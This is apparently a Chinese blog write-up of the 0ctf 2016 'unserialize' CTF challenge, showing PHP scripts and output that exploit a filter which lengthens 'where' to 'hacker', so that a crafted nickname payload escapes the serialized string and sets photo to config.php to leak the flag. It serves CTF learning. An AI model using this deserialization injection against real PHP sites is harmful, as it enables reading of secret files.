[0ctf 2016]unserialize

像这种反序列化题都会有源码

目录扫描dirsearch -u http://node4.anna.nssctf.cn:28978/

得到www.zip源码

大致的查看源码,发现flag藏在config.php文件中

那我们需要找到可以调出config.php文件的代码

profile.php文件中发现调用photo文件路径

由此想到可以将photo文件路径修改为config.php

根据这个线,找到可利用点

nickname可以利用数组绕过过滤

同时可以利用class.php中的filter过滤

先构造正确的序列化

php 复制代码
<?php
class f{
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
}
class u
{
	public $phone = "12345678901";
	public $email = "123@qq.com";
	public $nickname = array('');
	public $photo = "config.php";
	// public $photo = "upload/";
}
$s=new f;
$a=new u;
$b=serialize($a);
var_dump($b);
?>

结果:

php 复制代码
string(135) "O:1:"u":4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:0:"";}s:5:"photo";s:10:"config.php";}"

错误的序列化

php 复制代码
<?php
class f{
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
}
class u
{
	public $phone = "12345678901";
	public $email = "123@qq.com";
	public $nickname = array('');
	// public $photo = "config.php";
	public $photo = "upload/";
}
$s=new f;
$a=new u;
$b=serialize($a);
var_dump($b);
?>

结果:

php 复制代码
string(131) "O:1:"u":4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:0:"";}s:5:"photo";s:7:"upload/";}"

需要将";}s:5:"photo";s:10:"config.php";}推到";}s:5:"photo";s:7:"upload/";}的位置。
";}s:5:"photo";s:10:"config.php";}的长度为34

所以需要多出34个字符

以此推算,hacker比where多出一个字符,34个where即可

php 复制代码
<?php
class f{
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
}
class u
{
	public $phone = "12345678901";
	public $email = "123@qq.com";
	public $nickname = array('wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}');
	public $photo = "upload/";
}
$s=new f;
$a=new u;
var_dump($a);
$b=serialize($a);
// var_dump($b);
$c=$s->filter($b);
// var_dump($c);
$d=unserialize($c);
var_dump($d);
?>

结果:

php 复制代码
class u#2 (4) {
  public $phone =>
  string(11) "12345678901"
  public $email =>
  string(10) "123@qq.com"
  public $nickname =>
  array(1) {
    [0] =>
    string(204) "wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}"
  }
  public $photo =>
  string(7) "upload/"
}
class u#3 (4) {
  public $phone =>
  string(11) "12345678901"
  public $email =>
  string(10) "123@qq.com"
  public $nickname =>
  array(1) {
    [0] =>
    string(204) "hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"
  }
  public $photo =>
  string(10) "config.php"
}

playload:

php 复制代码
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

先输入http://node4.anna.nssctf.cn:28542/register.php随便注册一个账号

抓包update.php

修改相应的值,放包

查看网页源代码

将base64解密即可得到flag

相关推荐
可靠的仙人掌21 分钟前
SAC(Soft Actor-Critic)算法底座
开发语言·算法·php
qq_422152572 小时前
PDF内容复用的几种实用方法:转PPT、转图片、转长图
pdf·php·powerpoint
weixin_BYSJ198719 小时前
SpringBoot + MySQL 乒乓球运动员信息管理系统项目实战--附源码04954
java·javascript·spring boot·python·django·flask·php
用户3074596982071 天前
GatewayWorker 从零到一完整指南
javascript·php
XR1234567881 天前
食品饮料与制药行业GMP合规网络建设:无尘车间的网络不能成为污染源
开发语言·网络·php
AC赳赳老秦1 天前
传感器数据自动汇总:OpenClaw 采集多类传感器数据、清洗入库、生成趋势分析
java·人工智能·python·自动化·github·php·openclaw
Dynadot_tech1 天前
如何拍卖域名
开发语言·php
发光小北1 天前
Bronze100系列plc Modbus及自由口通信案例
开发语言·php
脏脏a1 天前
飞牛NAS部署EasyNVR实操:摄像头RTSP接入、本地录像与公网回看
开发语言·php
脚后跟法1 天前
.NET热门ORM真实的性能测试总结
jvm·php·.net